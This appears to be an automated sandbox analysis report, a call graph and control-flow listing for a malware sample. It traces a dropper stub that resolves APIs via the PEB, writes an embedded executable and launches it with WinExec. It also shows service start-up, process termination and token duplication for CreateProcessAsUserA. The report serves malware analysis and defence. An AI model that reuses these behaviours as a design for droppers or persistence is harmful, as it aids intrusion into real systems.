6428->6432 6429->6424 6429->6427 6430->6418 6431->6432 6433 402210 ExitProcess 6432->6433 6434 403000 6433->6434 6434->6415 6151 100038ac 6152 10003901 6151->6152 6153 10003597 10 API calls 6152->6153 6154 1000391a 6153->6154 6155 100094b0 6158 100094d0 6155->6158 6157 100094c4 6159 100094f1 6158->6159 6160 100094da 6158->6160 6159->6157 6161 100094df 6160->6161 6164 10009500 6160->6164 6161->6157 6163 100094eb 6163->6157 6165 10009530 6164->6165 6166 1000950b 6164->6166 6165->6163 6167 10009512 RtlDeleteCriticalSection ??3@YAXPAX 6166->6167 6167->6167 6168 10009527 6167->6168 6168->6163 6517 402e70 6518 402e7d 6517->6518 6519 402e91 6518->6519 6520 402e83 FreeLibrary 6518->6520 6520->6518 6520->6519 6526 10006b31 6527 10006b4b 6526->6527 6530 10002db1 6527->6530 6529 10006b58 6531 10002e14 6530->6531 6532 10007c60 25 API calls 6531->6532 6533 10002e95 RegisterServiceCtrlHandlerA 6532->6533 6535 10002eb6 6533->6535 6534 10002ef8 6534->6529 6535->6534 6541 10002efe SetServiceStatus 6535->6541 6537 10002ee9 6543 10002f60 6537->6543 6539 10002eee 6540 10002efe SetServiceStatus 6539->6540 6540->6534 6542 10002f40 6541->6542 6542->6537 6545 10002f8f 6543->6545 6544 10002ffe CreateThread 6546 1000302e 6544->6546 6547 10005cdf 6544->6547 6545->6544 6546->6539 6550 1000307d 6547->6550 6563 100031cc 6550->6563 6552 1000309e OpenSCManagerA 6553 100030bf 6552->6553 6554 100030e3 OpenServiceA 6553->6554 6555 10003188 CloseServiceHandle 6553->6555 6557 10003102 6554->6557 6556 1000319d 6555->6556 6559 10005b56 8 API calls 6556->6559 6557->6555 6558 10003126 StartServiceA 6557->6558 6560 10003145 6558->6560 6561 1000315c CloseServiceHandle 6558->6561 6559->6556 6560->6561 6561->6555 6562 10003171 6561->6562 6562->6555 6564 100031e6 6563->6564 6565 10003206 SetProcessWorkingSetSize 6564->6565 6566 1000322a 6565->6566 6566->6552 6515 100095b8 6516 1000958c __CxxFrameHandler 6515->6516 6516->6515 6655 10006fb8 6656 10006fcd RtlReAllocateHeap 6655->6656 6657 10006fde RtlAllocateHeap 6655->6657 6658 10006fec 6656->6658 6657->6658 6659 10006ff2 MessageBoxA 6658->6659 6660 1000700b 6658->6660 6661 10006df0 ExitProcess 6659->6661 6661->6660 6435 40217e 6436 402ea0 10 API calls 6435->6436 6437 402192 6436->6437 6437->6437 5342 401000 5347 4021a0 GetProcessHeap 5342->5347 5346 40100a 5348 401005 5347->5348 5349 4020fe 5348->5349 5350 402106 5349->5350 5355 401e0a 5350->5355 5352 40211d 5358 4010df 5352->5358 5354 402122 5354->5346 5379 401e2f 5355->5379 5357 401e1c 5357->5352 5396 401371 5358->5396 5360 401123 5404 402550 CreateFileA 5360->5404 5362 401195 5363 4011a0 LoadLibraryA 5362->5363 5367 40120d 5362->5367 5364 4011b5 5363->5364 5365 4011d9 GetProcAddress 5364->5365 5364->5367 5366 4011f3 5365->5366 5366->5367 5368 401235 OpenSCManagerA 5367->5368 5369 401259 5368->5369 5370 4012b6 5369->5370 5371 40127d OpenServiceA 5369->5371 5373 4012c0 StartServiceA 5370->5373 5374 401325 CloseServiceHandle 5370->5374 5372 40129c 5371->5372 5372->5370 5375 4012f6 CloseServiceHandle 5373->5375 5376 4012df 5373->5376 5378 40133a 5374->5378 5375->5374 5377 40130e 5375->5377 5376->5375 5377->5374 5378->5354 5382 401e84 5379->5382 5381 401e70 5381->5357 5383 401eba GetCurrentProcess 5382->5383 5384 401eeb OpenProcess 5382->5384 5385 401ecc 5383->5385 5384->5385 5386 401f38 LocalAlloc 5385->5386 5387 401f2e 5385->5387 5388 401f60 5386->5388 5387->5381 5389 401f84 NtQueryInformationProcess 5388->5389 5390 402057 CloseHandle 5388->5390 5391 401fa8 5389->5391 5392 40206c 5390->5392 5393 40202b LocalFree 5391->5393 5395 401fde 5391->5395 5392->5387 5393->5390 5394 402040 5393->5394 5394->5390 5395->5393 5397 4013d0 5396->5397 5398 40139a 5396->5398 5411 401500 5397->5411 5399 401500 10 API calls 5398->5399 5401 4013b0 5399->5401 5431 401a4c 5401->5431 5403 40140a 5403->5360 5405 4025e2 5404->5405 5409 402577 5404->5409 5405->5362 5406 4025d4 CloseHandle 5406->5405 5407 402595 WriteFile 5408 4025cc 5407->5408 5407->5409 5408->5406 5409->5406 5409->5407 5410 4025b9 FindCloseChangeNotification 5409->5410 5410->5362 5434 4025f0 5411->5434 5413 401547 5414 40158a SHGetSpecialFolderPathW 5413->5414 5418 401783 5413->5418 5415 4015ac 5414->5415 5416 4015da lstrlenW 5415->5416 5430 4015d0 5415->5430 5417 4015ef 5416->5417 5417->5430 5439 402620 5417->5439 5420 40189d GetTempPathW 5418->5420 5421 40196e 5418->5421 5424 4018b7 5420->5424 5422 4019a0 5421->5422 5423 401978 5421->5423 5426 401500 7 API calls 5422->5426 5422->5430 5425 401500 7 API calls 5423->5425 5427 402620 4 API calls 5424->5427 5424->5430 5425->5430 5426->5430 5427->5430 5428 401675 5429 402620 4 API calls 5428->5429 5429->5430 5430->5401 5461 401a76 5431->5461 5433 401a65 5433->5403 5435 4025f9 5434->5435 5436 4025fd 5434->5436 5435->5413 5445 402330 5436->5445 5440 40262a 5439->5440 5442 40262f 5439->5442 5440->5428 5441 402637 5441->5428 5442->5441 5455 402380 5442->5455 5446 402344 RtlAllocateHeap 5445->5446 5447 402339 GetProcessHeap 5445->5447 5448 402372 5446->5448 5449 402359 MessageBoxA 5446->5449 5447->5446 5448->5413 5451 402210 5449->5451 5452 402218 5451->5452 5453 402221 ExitProcess 5452->5453 5454 40222d 5452->5454 5454->5448 5456 402394 RtlAllocateHeap 5455->5456 5457 402389 GetProcessHeap 5455->5457 5458 4023c2 5456->5458 5459 4023a9 MessageBoxA 5456->5459 5457->5456 5458->5428 5460 402210 ExitProcess 5459->5460 5460->5458 5462 401a90 5461->5462 5467 401b97 5462->5467 5464 401aa2 5481 402770 5464->5481 5466 401af2 5466->5433 5468 401bd7 5467->5468 5469 401c0b lstrlenW 5468->5469 5470 401c20 5468->5470 5469->5470 5471 401c58 WideCharToMultiByte 5470->5471 5475 401d84 5470->5475 5472 401c8e 5471->5472 5473 4025f0 4 API calls 5472->5473 5474 401cc1 5473->5474 5476 401ce8 WideCharToMultiByte 5474->5476 5475->5464 5477 401d34 strlen 5476->5477 5478 401d1d 5476->5478 5479 401d4c 5477->5479 5478->5477 5480 402620 4 API calls 5479->5480 5480->5475 5482 402780 5481->5482 5484 402790 5482->5484 5487 402250 5482->5487 5486 40281a 5484->5486 5496 402670 5484->5496 5486->5466 5488 402264 5487->5488 5489 4022c1 wsprintfA 5488->5489 5490 40229a wsprintfA 5488->5490 5492 4022d6 5489->5492 5490->5492 5491 402309 MessageBoxA 5493 40231d 5491->5493 5492->5491 5492->5493 5494 402210 ExitProcess 5493->5494 5495 402324 5494->5495 5495->5484 5497 402683 5496->5497 5499 40269a 5496->5499 5498 4026e7 5497->5498 5497->5499 5501 4026ba 5497->5501 5510 403040 5498->5510 5499->5486 5505 403080 5501->5505 5502 4026f6 5502->5486 5504 4026de 5504->5486 5506 403089 5505->5506 5507 40308d 5505->5507 5506->5504 5508 402380 4 API calls 5507->5508 5509 403098 5508->5509 5509->5504 5511 403049 5510->5511 5512 40304d 5510->5512 5511->5502 5513 402380 4 API calls 5512->5513 5514 403057 5513->5514 5514->5502 5515 10006d40 5516 10006d49 5515->5516 5517 10006d6c 5515->5517 5516->5517 5522 10006d80 GetProcessHeap 5516->5522 5523 10006d5a 5522->5523 5524 10008670 5523->5524 5527 10006c14 5524->5527 5528 10006c1c 5527->5528 5533 10005fb4 5528->5533 5530 10006c26 5536 1000626a 5530->5536 5532 10006c2b 5550 10005fd9 5533->5550 5535 10005fc6 5535->5530 5538 1000627d 5536->5538 5567 10006649 5538->5567 5539 10006334 5540 10006649 20 API calls 5539->5540 5545 100063d3 5539->5545 5541 10006369 5540->5541 5542 10006649 20 API calls 5541->5542 5541->5545 5543 1000639e 5542->5543 5544 10006649 20 API calls 5543->5544 5543->5545 5544->5545 5583 10007c60 5545->5583 5547 1000650a 5548 1000657a StartServiceCtrlDispatcherA 5547->5548 5549 10006589 5548->5549 5549->5532 5553 1000602e 5550->5553 5552 1000601a 5552->5535 5554 10006064 GetCurrentProcess 5553->5554 5555 10006095 OpenProcess 5553->5555 5556 10006076 5554->5556 5555->5556 5557 100060e2 LocalAlloc 5556->5557 5558 100060d8 5556->5558 5559 1000610a 5557->5559 5558->5552 5560 10006201 CloseHandle 5559->5560 5561 1000612e NtQueryInformationProcess 5559->5561 5562 10006216 5560->5562 5564 10006152 5561->5564 5562->5558 5563 100061d5 LocalFree 5563->5560 5565 100061ea 5563->5565 5564->5563 5566 10006188 5564->5566 5565->5560 5566->5563 5568 10006663 5567->5568 5569 10006684 CreateToolhelp32Snapshot 5568->5569 5570 100066c1 5569->5570 5571 1000670f Process32First 5570->5571 5573 100066e5 5570->5573 5572 1000679e 5571->5572 5598 10007080 5572->5598 5573->5539 5575 10006ab0 FindCloseChangeNotification 5575->5573 5578 10006905 CloseHandle 5579 1000691a 5578->5579 5579->5573 5580 1000694c Process32Next 5582 10006825 5580->5582 5581 10007080 5 API calls 5581->5582 5582->5575 5582->5578 5582->5580 5582->5581 5605 10007210 5582->5605 5626 10007ee0 5582->5626 5584 10007cfa 5583->5584 5590 10007c73 5583->5590 5585 10007d01 5584->5585 5586 10007d28 5584->5586 5587 10007cda 5585->5587 5588 10007d1a _ftol 5585->5588 5586->5587 5589 10007d2f _ftol 5586->5589 5587->5547 5588->5547 5589->5587 5590->5587 5591 10007c98 5590->5591 5661 10008f50 5591->5661 5593 10007cb4 5594 10007cd3 5593->5594 5595 10007cbd atoi 5593->5595 5594->5547 5673 10007020 5595->5673 5599 10007091 5598->5599 5602 10007096 5598->5602 5629 10006dc0 5599->5629 5600 100070f4 5600->5582 5602->5600 5602->5602 5632 10006f60 5602->5632 5606 10007298 5605->5606 5618 1000722f 5605->5618 5607 10007389 5606->5607 5609 100072a3 5606->5609 5608 10007390 5607->5608 5611 10007407 5607->5611 5613 1000737a 5608->5613 5614 100073d8 sprintf 5608->5614 5610 10007477 5609->5610 5609->5613 5615 10007343 5609->5615 5616 10007325 5609->5616 5624 100072be 5609->5624 5610->5582 5611->5610 5617 10007442 sprintf 5611->5617 5612 100073b5 sprintf 5612->5624 5613->5610 5613->5612 5614->5624 5647 10008700 modf 5615->5647 5620 100071a0 4 API calls 5616->5620 5617->5624 5618->5610 5642 100071a0 5618->5642 5623 10007334 5620->5623 5622 10007289 5622->5582 5623->5582 5624->5610 5625 10006f60 4 API calls 5624->5625 5625->5610 5627 10007f23 _strcmpi 5626->5627 5628 10007ee8 5626->5628 5627->5582 5628->5582 5630 10006dd0 5629->5630 5631 10006dc9 GetModuleHandleA 5629->5631 5630->5602 5631->5630 5633 10006f74 RtlAllocateHeap 5632->5633 5634 10006f69 GetProcessHeap 5632->5634 5635 10006fa2 5633->5635 5636 10006f89 MessageBoxA 5633->5636 5634->5633 5635->5582 5638 10006df0 5636->5638 5639 10006df8 5638->5639 5640 10006e01 ExitProcess 5639->5640 5641 10006e0d 5639->5641 5641->5635 5644 100071b1 5642->5644 5643 100071be 5643->5622 5644->5643 5645 10006f60 4 API calls 5644->5645 5646 100071ea 5645->5646 5646->5622 5653 10009200 _ftol 5647->5653 5649 10008743 5654 10009080 5649->5654 5651 10008761 sprintf 5651->5624 5653->5649 5655 100091d5 _ftol 5654->5655 5656 10009099 5654->5656 5655->5651 5656->5655 5657 100090aa 5656->5657 5658 100090c0 _ftol 5657->5658 5659 100090d3 _ftol 5657->5659 5660 100090e4 5658->5660 5659->5660 5660->5651 5662 10008f5d 5661->5662 5663 10008f64 5662->5663 5680 10009270 5662->5680 5663->5593 5665 10008f84 5666 10009270 11 API calls 5665->5666 5667 10008f9b malloc LCMapStringA 5666->5667 5669 10008fee ??3@YAXPAX 5667->5669 5670 10008ffb 5667->5670 5669->5670 5699 10008a60 5670->5699 5672 10009009 ??3@YAXPAX 5672->5593 5674 10007066 5673->5674 5675 1000702d 5673->5675 5674->5547 5676 10006dc0 GetModuleHandleA 5675->5676 5677 1000703b 5675->5677 5676->5677 5677->5674 5678 1000704b IsBadHugeReadPtr 5677->5678 5678->5674 5679 10007058 HeapFree 5678->5679 5679->5674 5684 10009295 5680->5684 5681 100092e2 _strncoll 5681->5684 5682 10009345 5704 10008cd0 5682->5704 5684->5681 5684->5682 5688 1000933d 5684->5688 5689 10008d60 8 API calls 5684->5689 5686 10008cd0 2 API calls 5687 10009367 5686->5687 5687->5665 5688->5682 5692 1000937c 5688->5692 5689->5684 5690 1000939f malloc 5691 10008cd0 2 API calls 5690->5691 5693 100093ea 5691->5693 5692->5690 5707 10008d60 5692->5707 5695 100093f2 ??3@YAXPAX 5693->5695 5696 100093fe 5693->5696 5695->5696 5697 10008cd0 2 API calls 5696->5697 5698 1000941a 5697->5698 5698->5665 5700 10008a69 5699->5700 5701 10008a6d 5699->5701 5700->5672 5702 10006f60 4 API calls 5701->5702 5703 10008a78 5702->5703 5703->5672 5714 10008cf0 5704->5714 5706 10008cdc 5706->5686 5708 10008d6a 5707->5708 5711 10008d7a 5707->5711 5720 10008bc0 5708->5720 5710 10008d76 5710->5711 5737 10008dc0 5710->5737 5711->5690 5713 10008d91 5713->5690 5715 10008cfa 5714->5715 5716 10008d4e 5714->5716 5717 10008d0e 5715->5717 5718 10008d44 HeapFree 5715->5718 5719 10008d39 GetProcessHeap 5715->5719 5716->5706 5717->5706 5718->5716 5719->5718 5721 10008bda 5720->5721 5722 10008bcd 5720->5722 5723 10008be1 5721->5723 5727 10008bef 5721->5727 5724 10008cd0 2 API calls 5722->5724 5742 10008af0 5723->5742 5734 10008bd2 5724->5734 5726 10008be9 5726->5710 5728 10008c22 5727->5728 5729 10008c34 GetProcessHeap 5727->5729 5730 10008c3f 5727->5730 5728->5710 5729->5730 5731 10008ca2 RtlReAllocateHeap 5730->5731 5732 10008c44 RtlAllocateHeap 5730->5732 5731->5734 5733 10008c60 5732->5733 5732->5734 5735 10008cf0 2 API calls 5733->5735 5734->5710 5736 10008c88 5735->5736 5736->5710 5738 10008e13 5737->5738 5739 10008dc8 5737->5739 5738->5713 5740 10008dcd 5739->5740 5741 10008e00 memmove 5739->5741 5740->5713 5741->5738 5743 10008afc 5742->5743 5745 10008b0c 5742->5745 5744 10008bc0 5 API calls 5743->5744 5746 10008b06 5744->5746 5747 10008b8a RtlAllocateHeap 5745->5747 5748 10008b7f GetProcessHeap 5745->5748 5750 10008b14 5745->5750 5746->5726 5749 10008ba1 5747->5749 5748->5747 5749->5726 5750->5726 6521 10008ac0 6522 10008cd0 2 API calls 6521->6522 6523 10008ace 6522->6523 6524 10008ad5 ??3@YAXPAX 6523->6524 6525 10008ade 6523->6525 6524->6525 6567 10007f40 6568 10008332 6567->6568 6569 10007f59 6567->6569 6570 10008428 wsprintfA MessageBoxA 6568->6570 6572 10008365 6568->6572 6573 100083f7 6568->6573 6574 10008348 6568->6574 6575 100083a9 wsprintfA MessageBoxA 6568->6575 6605 10008000 6568->6605 6571 10007f5f 6569->6571 6588 1000827b 6569->6588 6570->6605 6576 10008174 6571->6576 6577 10007f6a 6571->6577 6585 10007020 3 API calls 6572->6585 6579 10006df0 ExitProcess 6573->6579 6582 10006f10 4 API calls 6574->6582 6578 10006df0 ExitProcess 6575->6578 6580 10008182 6576->6580 6581 1000823d GetModuleFileNameA 6576->6581 6583 10007f70 6577->6583 6584 10008134 GetCommandLineA 6577->6584 6587 100083e5 6578->6587 6589 10008404 6579->6589 6591 10008203 GetModuleFileNameA 6580->6591 6592 10008185 6580->6592 6586 10008257 strrchr 6581->6586 6581->6605 6593 10008355 6582->6593 6594 100080d5 6583->6594 6595 10007f7b 6583->6595 6584->6605 6596 10008372 6585->6596 6588->6570 6588->6572 6588->6573 6588->6574 6588->6575 6599 100082cc 6588->6599 6588->6605 6608 100082ad 6588->6608 6590 10007020 3 API calls 6600 10008320 6590->6600 6597 1000821d strrchr 6591->6597 6591->6605 6592->6570 6601 1000818e PeekMessageA 6592->6601 6594->6570 6598 100080e0 6594->6598 6602 10007fb2 GetModuleFileNameA 6595->6602 6603 10007f7d 6595->6603 6598->6605 6609 10008120 _ftol 6598->6609 6610 10008100 6598->6610 6599->6590 6599->6605 6601->6605 6606 100081ab 6601->6606 6604 10007fc8 strrchr 6602->6604 6602->6605 6603->6570 6607 10007f8e 6603->6607 6604->6605 6606->6605 6613 100081c8 GetMessageA TranslateMessage DispatchMessageA PeekMessageA 6606->6613 6616 10009020 6608->6616 6610->6605 6612 1000810c _ftol 6610->6612 6613->6606 6615 100081f6 6613->6615 6619 1000903b 6616->6619 6617 1000906b 6618 10007020 3 API calls 6617->6618 6620 100082ba 6618->6620 6619->6617 6621 10007020 3 API calls 6619->6621 6621->6619 6056 40180b 6057 40186a 6056->6057 6058 401500 10 API calls 6057->6058 6059 401883 6058->6059 5751 402210 5752 402218 5751->5752 5753 402221 ExitProcess 5752->5753 5754 40222d 5752->5754 6060 10009450 6061 1000945f CreateThread 6060->6061 6063 100094a3 CloseHandle 6061->6063 6064 10009494 6061->6064 6064->6063 6065 1000949b 6064->6065 6438 402910 6439 402d02 6438->6439 6440 402929 6438->6440 6441 402df8 wsprintfA MessageBoxA 6439->6441 6443 402d54 6439->6443 6444 402d35 6439->6444 6445 402dc7 6439->6445 6446 402d18 6439->6446 6447 402d79 wsprintfA MessageBoxA 6439->6447 6484 4029d0 6439->6484 6442 40292f 6440->6442 6470 402c4b 6440->6470 6441->6484 6448 402b44 6442->6448 6449 40293a 6442->6449 6503 4023d0 6443->6503 6455 402440 3 API calls 6444->6455 6458 402210 ExitProcess 6445->6458 6452 402330 4 API calls 6446->6452 6457 402210 ExitProcess 6447->6457 6450 402b52 6448->6450 6451 402c0d GetModuleFileNameA 6448->6451 6453 402940 6449->6453 6454 402b04 GetCommandLineA 6449->6454 6461 402bd3 GetModuleFileNameA 6450->6461 6462 402b55 6450->6462 6468 402c27 strrchr 6451->6468 6451->6484 6463 402d25 6452->6463 6464 402aa5 6453->6464 6465 40294b 6453->6465 6454->6484 6466 402d42 6455->6466 6469 402db5 6457->6469 6459 402dd4 6458->6459 6477 402bed strrchr 6461->6477 6461->6484 6462->6441 6474 402b5e PeekMessageA 6462->6474 6464->6441 6471 402ab0 6464->6471 6475 402982 GetModuleFileNameA 6465->6475 6476 40294d 6465->6476 6470->6441 6470->6443 6470->6444 6470->6445 6470->6446 6470->6447 6472 402c9c 6470->6472 6481 402c7d 6470->6481 6470->6484 6482 402af0 _ftol 6471->6482 6483 402ad0 6471->6483 6471->6484 6472->6484 6496 402440 6472->6496 6478 402b7b 6474->6478 6474->6484 6480 402998 strrchr 6475->6480 6475->6484 6476->6441 6479 40295e 6476->6479 6478->6484 6487 402b98 GetMessageA TranslateMessage DispatchMessageA PeekMessageA 6478->6487 6480->6484 6490 4032e0 6481->6490 6483->6484 6486 402adc _ftol 6483->6486 6487->6478 6489 402bc6 6487->6489 6491 4032fb 6490->6491 6492 40332b 6491->6492 6495 402440 3 API calls 6491->6495 6493 402440 3 API calls 6492->6493 6494 402c8a 6493->6494 6495->6491 6497 402486 6496->6497 6498 40244d 6496->6498 6499 40245b 6498->6499 6512 4021e0 6498->6512 6499->6497 6501 40246b IsBadHugeReadPtr 6499->6501 6501->6497 6502 402478 HeapFree 6501->6502 6502->6497 6504 4023e4 6503->6504 6505 4023d9 GetProcessHeap 6503->6505 6506 4023ed RtlReAllocateHeap 6504->6506 6507 4023fe RtlAllocateHeap 6504->6507 6505->6504 6508 40240c 6506->6508 6507->6508 6509 402412 MessageBoxA 6508->6509 6510 40242b 6508->6510 6511 402210 ExitProcess 6509->6511 6511->6510 6513 4021f0 6512->6513 6514 4021e9 GetModuleHandleA 6512->6514 6513->6499 6514->6513 5764 531000 5766 531044 GetPEB 5764->5766 5767 531077 CreateFileA 5766->5767 5769 531265 5767->5769 5770 53122d 5767->5770 5771 531246 WriteFile 5770->5771 5772 531244 5770->5772 5773 531255 FindCloseChangeNotification WinExec 5771->5773 5772->5773 5773->5769 6187 10005cd3 6190 1000324f 6187->6190 6206 1000342f 6190->6206 6192 1000327e 6214 10003e4a 6192->6214 6194 100032ca 6195 10003306 6194->6195 6219 10007d40 CreateFileA 6194->6219 6226 1000477d 6195->6226 6198 10003320 6199 10003e4a 12 API calls 6198->6199 6201 10007d40 4 API calls 6198->6201 6205 1000477d 9 API calls 6198->6205 6240 10004ce1 6198->6240 6250 10004ea7 6198->6250 6256 10005a49 6198->6256 6264 10005b56 6198->6264 6199->6198 6201->6198 6205->6198 6207 10003458 6206->6207 6208 1000348e 6206->6208 6210 10003597 10 API calls 6207->6210 6209 10003597 10 API calls 6208->6209 6211 1000346e 6209->6211 6210->6211 6273 10003ae3 6211->6273 6213 100034c8 6213->6192 6294 10003e94 6214->6294 6216 10003e67 6302 10004333 6216->6302 6218 10003e73 6218->6194 6220 10007dd2 6219->6220 6221 10007d67 6219->6221 6220->6195 6222 10007dc4 CloseHandle 6221->6222 6223 10007d85 WriteFile 6221->6223 6225 10007da9 CloseHandle 6221->6225 6222->6220 6223->6221 6224 10007dbc 6223->6224 6224->6222 6225->6195 6227 10004790 6226->6227 6228 100047d0 WTSGetActiveConsoleSessionId 6227->6228 6229 10004825 6228->6229 6230 1000483c 74AE1930 6228->6230 6229->6230 6231 10004858 6230->6231 6232 1000486f DuplicateTokenEx 6230->6232 6231->6232 6233 100048b6 74727ED0 6232->6233 6234 1000489f 6232->6234 6235 100048d7 6233->6235 6234->6233 6327 10007e50 6235->6327 6237 10004945 6238 1000495f CreateProcessAsUserA 6237->6238 6239 10004a56 6238->6239 6239->6198 6241 10004d25 6240->6241 6249 10004e1f 6240->6249 6242 10004d46 LocalAlloc 6241->6242 6243 10004d63 6242->6243 6244 10004d7a EnumProcesses 6242->6244 6243->6244 6247 10004d99 6244->6247 6245 10004e4b LocalFree 6245->6249 6246 10004e48 6246->6245 6247->6245 6247->6246 6248 10004e0a LocalFree 6247->6248 6248->6249 6249->6198 6251 10004ec8 6250->6251 6332 10004f9b 6251->6332 6253 10004ed7 6254 10004eee SendMessageTimeoutA 6253->6254 6255 10004ee4 6253->6255 6254->6255 6255->6198 6257 10005a6a GetCurrentProcess 6256->6257 6258 10005a9b OpenProcess 6256->6258 6259 10005a7c 6257->6259 6258->6259 6260 10005ae8 TerminateProcess 6259->6260 6261 10005ade 6259->6261 6262 10005b02 6260->6262 6263 10005b19 CloseHandle 6260->6263 6261->6198 6262->6263 6263->6261 6265 10005b69 6264->6265 6266 10005ba5 CreateWaitableTimerA 6265->6266 6267 10005bce 6266->6267 6268 10005c95 6267->6268 6269 10005bf2 SetWaitableTimer 6267->6269 6268->6198 6270 10005c33 MsgWaitForMultipleObjects 6269->6270 6271 10005c1c 6269->6271 6270->6271 6271->6268 6271->6270 6377 10007e70 PeekMessageA 6271->6377 6276 10003b0d 6273->6276 6275 10003afc 6275->6213 6277 10003b27 6276->6277 6282 10003bd7 6277->6282 6279 10003b39 6280 100078c0 7 API calls 6279->6280 6281 10003b89 6280->6281 6281->6275 6283 10003c17 6282->6283 6284 10003c4b lstrlenW 6283->6284 6285 10003c60 6283->6285 6284->6285 6286 10003c98 WideCharToMultiByte 6285->6286 6290 10003dc4 6285->6290 6287 10003cce 6286->6287 6288 10007790 4 API calls 6287->6288 6289 10003d01 6288->6289 6291 10003d28 WideCharToMultiByte 6289->6291 6290->6279 6292 10003d5d 6291->6292 6293 10007de0 4 API calls 6292->6293 6293->6290 6295 10003eb4 6294->6295 6296 10007680 4 API calls 6295->6296 6297 10003ec9 6296->6297 6312 10003f7a 6297->6312 6299 10003ede 6301 10003f28 6299->6301 6320 1000415e 6299->6320 6301->6216 6303 1000434d 6302->6303 6304 100044f8 FindFirstFileW 6303->6304 6305 10004508 6304->6305 6306 10007080 5 API calls 6305->6306 6307 100045d0 6306->6307 6308 10007080 5 API calls 6307->6308 6309 1000461b 6308->6309 6310 10004672 FindClose 6309->6310 6311 10004668 6309->6311 6310->6311 6311->6218 6314 10003fb3 6312->6314 6313 10004037 MultiByteToWideChar 6316 10004063 6313->6316 6314->6313 6315 10004100 6314->6315 6315->6299 6317 10007790 4 API calls 6316->6317 6318 100040ae 6317->6318 6319 100040d5 MultiByteToWideChar 6318->6319 6319->6315 6321 10004193 6320->6321 6322 100042e0 6321->6322 6323 10004282 6321->6323 6326 100041b8 6321->6326 6324 10007de0 4 API calls 6322->6324 6325 10007de0 4 API calls 6323->6325 6324->6326 6325->6326 6326->6301 6328 10007e59 6327->6328 6329 10007e5d 6327->6329 6328->6237 6330 10006f60 4 API calls 6329->6330 6331 10007e64 6330->6331 6331->6237 6334 10004fae 6332->6334 6338 100051a3 6334->6338 6335 10005118 6335->6253 6336 10005042 6336->6335 6342 10005a04 GetAncestor 6336->6342 6339 100051bb 6338->6339 6340 10005229 EnumWindows 6339->6340 6341 10005246 6340->6341 6344 100059e5 6340->6344 6341->6336 6343 10005a27 6342->6343 6343->6335 6347 1000528c 6344->6347 6346 100059fe 6348 100052a6 6347->6348 6357 10005702 GetWindowThreadProcessId 6348->6357 6350 100054a5 6359 10005750 GetWindowThreadProcessId 6350->6359 6352 10005503 6361 1000579b 6352->6361 6354 10005561 6366 100058fa 6354->6366 6356 100055d9 6356->6346 6358 1000572b 6357->6358 6358->6350 6360 10005779 6359->6360 6360->6352 6371 100057d9 GetWindowTextLengthW 6361->6371 6363 100057ac 6364 10003ae3 13 API calls 6363->6364 6365 100057b8 6364->6365 6365->6354 6367 10007750 4 API calls 6366->6367 6368 10005925 6367->6368 6369 1000593f GetClassNameA 6368->6369 6370 10005960 6369->6370 6370->6356 6372 10005805 6371->6372 6373 10007790 4 API calls 6372->6373 6376 10005829 6372->6376 6374 10005867 6373->6374 6375 1000588e GetWindowTextW 6374->6375 6375->6376 6376->6363 6378 10007ed7 6377->6378 6379 10007e90 6377->6379 6378->6271 6379->6378 6380 10007ea9 GetMessageA TranslateMessage DispatchMessageA PeekMessageA 6379->6380 6380->6378 6380->6379 5755 1012def0 5756 1012defb 5755->5756 5763 1012e0d4 5755->5763 5757 1012e02a LoadLibraryA 5756->5757 5762 1012e066 VirtualProtect VirtualProtect 5756->5762 5758 1012e041 5757->5758 5758->5756 5759 1012e048 GetProcAddress 5758->5759 5759->5758 5761 1012e060 5759->5761 5762->5763 5763->5763

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 531044-531074 GetPEB 1 531077-53109a 0->1 2 53109d-5310a0 1->2 3 5310a6-5310bc 2->3 4 5311ee-53122b CreateFileA 2->4 5 531110-531116 3->5 6 5310be-5310c5 3->6 21 531265-531269 4->21 22 53122d-531230 4->22 9 531129-53112f 5->9 10 531118-53111f 5->10 6->5 7 5310c7-5310ce 6->7 7->5 13 5310d0-5310d7 7->13 11 531131-531138 9->11 12 531148-53114e 9->12 10->9 14 531121-531124 10->14 11->12 16 53113a-531141 11->16 17 531150-531157 12->17 18 531167-53116f 12->18 13->5 19 5310d9-5310dd 13->19 15 5311bb-5311c0 14->15 24 5311c2-5311c5 15->24 25 5311e0-5311e9 15->25 16->12 23 531143-531146 16->23 17->18 26 531159-531160 17->26 27 531171-531178 18->27 28 531188-53118e 18->28 19->5 29 5310df-5310e3 19->29 30 531232-531238 22->30 23->15 24->25 31 5311c7-5311ca 24->31 25->2 26->18 32 531162-531165 26->32 27->28 33 53117a-531181 27->33 35 531190-531197 28->35 36 5311a7-5311ad 28->36 29->15 34 5310e9-53110b 29->34 38 531246-531252 WriteFile 30->38 39 53123a-531242 30->39 31->25 40 5311cc-5311cf 31->40 32->15 33->28 41 531183-531186 33->41 34->1 35->36 42 531199-5311a0 35->42 36->15 37 5311af-5311b6 36->37 37->15 43 5311b8 37->43 45 531255-531262 FindCloseChangeNotification WinExec 38->45 39->30 44 531244 39->44 40->25 46 5311d1-5311d4 40->46 41->15 42->36 48 5311a2-5311a5 42->48 43->15 44->45 45->21 46->25 49 5311d6-5311d9 46->49 48->15 49->25 50 5311db-5311de 49->50 50->4 50->25
                                                            APIs
                                                            • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00531223
                                                            • WriteFile.KERNELBASE(00000000,FFFFBEDB,00003E00,?,00000000), ref: 00531252
                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00531256
                                                            • WinExec.KERNEL32(?,00000005), ref: 00531262
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1697791529.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1697266786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697436745.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697436745.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697766713.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697816514.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                                                            • String ID: .dll$Clos$Crea$GetM$GetT$Kern$VSFdoO.exe$WinE$Writ$athA$catA$dleA$el32$lstr$odul
